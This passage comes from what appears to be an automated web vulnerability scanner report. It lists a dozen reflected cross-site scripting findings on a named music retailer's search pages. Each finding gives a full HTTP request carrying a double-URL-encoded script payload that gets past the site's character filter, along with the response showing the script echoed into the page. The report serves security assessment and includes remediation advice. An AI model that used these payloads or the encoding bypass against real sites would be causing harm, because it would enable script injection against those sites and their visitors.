This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capleton%2069924%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e813b74ec99f&%20Jah%20Mali&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=nl98eni7bgm0kn39m8eq5ts496; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=284904447; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=543920325; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capleton 69924"><script>alert(1)</script>813b74ec99f" />
...[SNIP]...

1.80. http://www.insound.com/search/query/Capleton%20&%20Jah%20Mali&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capleton%20&%20Jah%20Mali&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d0a70%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb438cca3dd was submitted in the REST URL parameter 3. This input was echoed as d0a70</title><script>alert(1)</script>b438cca3dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capleton%20d0a70%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb438cca3dd&%20Jah%20Mali&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=bt9sd19op7rqakbmahb5mtgh84; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=554921211; expires=Sun, 09-Jan-2011 02:39:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=533875293; expires=Sun, 09-Jan-2011 02:39:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capleton d0a70</title><script>alert(1)</script>b438cca3dd</title>
...[SNIP]...

1.81. http://www.insound.com/search/query/Capleton&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capleton&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e3d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e150de7e4364 was submitted in the REST URL parameter 3. This input was echoed as 3e3d8"><script>alert(1)</script>150de7e4364 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capleton3e3d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e150de7e4364&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=i1rehfcsf82bafo6n79e945nv7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=136571780; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=354807980; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capleton3e3d8"><script>alert(1)</script>150de7e4364" />
...[SNIP]...

1.82. http://www.insound.com/search/query/Capleton&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capleton&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 95b92%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee1c8b3026e9 was submitted in the REST URL parameter 3. This input was echoed as 95b92</title><script>alert(1)</script>e1c8b3026e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capleton95b92%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee1c8b3026e9&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7i88o6dq1me4e39ngmth849rq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:47 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=431563513; expires=Sun, 09-Jan-2011 02:39:47 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=538179491; expires=Sun, 09-Jan-2011 02:39:47 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capleton95b92</title><script>alert(1)</script>e1c8b3026e9</title>
...[SNIP]...

1.83. http://www.insound.com/search/query/Cappadonna&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cappadonna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload fd721%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1a3d920bd4a was submitted in the REST URL parameter 3. This input was echoed as fd721</title><script>alert(1)</script>1a3d920bd4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cappadonnafd721%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1a3d920bd4a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=dmpq3vvu6g8jo3ogcl6344as31; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=202638193; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=350828681; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cappadonnafd721</title><script>alert(1)</script>1a3d920bd4a</title>
...[SNIP]...

1.84. http://www.insound.com/search/query/Cappadonna&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cappadonna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daf78%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e36e33dc363 was submitted in the REST URL parameter 3. This input was echoed as daf78"><script>alert(1)</script>36e33dc363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cappadonnadaf78%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e36e33dc363&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=n51q735nj96h1ja8u68c1t7kt2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=482592070; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=109046725; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cappadonnadaf78"><script>alert(1)</script>36e33dc363" />
...[SNIP]...

1.85. http://www.insound.com/search/query/Capsize%207&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capsize%207&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d6d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e92b586a2299 was submitted in the REST URL parameter 3. This input was echoed as 3d6d3"><script>alert(1)</script>92b586a2299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capsize%2073d6d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e92b586a2299&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=u2guejbqb7mgnkj12clmp0r3r4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=299855511; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=186472612; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capsize 73d6d3"><script>alert(1)</script>92b586a2299" />
...[SNIP]...

1.86. http://www.insound.com/search/query/Capsize%207&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capsize%207&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b8434%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b88e3caf12 was submitted in the REST URL parameter 3. This input was echoed as b8434</title><script>alert(1)</script>8b88e3caf12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capsize%207b8434%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b88e3caf12&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=fsf9hpuu8d8t1emjj6ijr7f6m3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=389399160; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=300943266; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capsize 7b8434</title><script>alert(1)</script>8b88e3caf12</title>
...[SNIP]...

1.87. http://www.insound.com/search/query/Capsula&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capsula&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e7af6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec37518ec6c6 was submitted in the REST URL parameter 3. This input was echoed as e7af6</title><script>alert(1)</script>c37518ec6c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capsulae7af6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec37518ec6c6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=fipgbhb04qsn1sjchn3eb7bmn4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=399768520; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=293189086; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capsulae7af6</title><script>alert(1)</script>c37518ec6c6</title>
...[SNIP]...

1.88. http://www.insound.com/search/query/Capsula&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capsula&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8e9f620e9fc was submitted in the REST URL parameter 3. This input was echoed as bdd2c"><script>alert(1)</script>8e9f620e9fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capsulabdd2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8e9f620e9fc&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ch7bc0g09e5l6qsopg0ntlers6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=396224894; expires=Sun, 09-Jan-2011 02:39:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=117160064; expires=Sun, 09-Jan-2011 02:39:43 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capsulabdd2c"><script>alert(1)</script>8e9f620e9fc" />
...[SNIP]...

1.89. http://www.insound.com/search/query/Captain%20&%20Tennille&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20&%20Tennille&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 7afc4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac64a0d37f6 was submitted in the REST URL parameter 3. This input was echoed as 7afc4</title><script>alert(1)</script>ac64a0d37f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%207afc4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac64a0d37f6&%20Tennille&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=od08gncmlipbl02rcnp46rfdn2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=288555421; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=540366421; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Captain 7afc4</title><script>alert(1)</script>ac64a0d37f6</title>
...[SNIP]...

1.90. http://www.insound.com/search/query/Captain%20&%20Tennille&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20&%20Tennille&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c169%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a4dc65b368 was submitted in the REST URL parameter 3. This input was echoed as 6c169"><script>alert(1)</script>3a4dc65b368 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%206c169%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a4dc65b368&%20Tennille&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=63380r8eb3k86hht056bb6a1v2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=288247081; expires=Sun, 09-Jan-2011 02:39:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=92387229; expires=Sun, 09-Jan-2011 02:39:45 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Captain 6c169"><script>alert(1)</script>3a4dc65b368" />
...[SNIP]...

1.91. http://www.insound.com/search/query/Captain%20Ahab&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Ahab&from=47597/

Issue detail

